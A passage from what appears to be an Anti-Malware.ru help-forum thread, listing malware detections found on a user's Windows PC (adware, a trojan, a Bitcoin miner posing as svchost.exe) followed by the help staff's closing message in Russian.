- c:\users\александр и ко\appdata\roaming\windowsupdater\updater.exe - not-a-virus:HEUR:AdWare.Win32.Generic ( BitDefender: Gen:Variant.Zusy.169520 )
- c:\users\04ca~1\appdata\roaming\curl\curl_7_54.exe - UDS:DangerousObject.Multi.Generic
- c:\windows\microsoft\svchost.exe - Trojan.Win32.SelfDel.gbpf
- c:\windows\microsoft\svchost.exe.exe - not-a-virus:RiskTool.Win64.BitCoinMiner.cwo
- c:\windows\system32\ea3host.exe - not-a-virus:AdWare.Win64.Agent.mik
Уважаемый(ая) Tulio, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
Ваши права в разделе
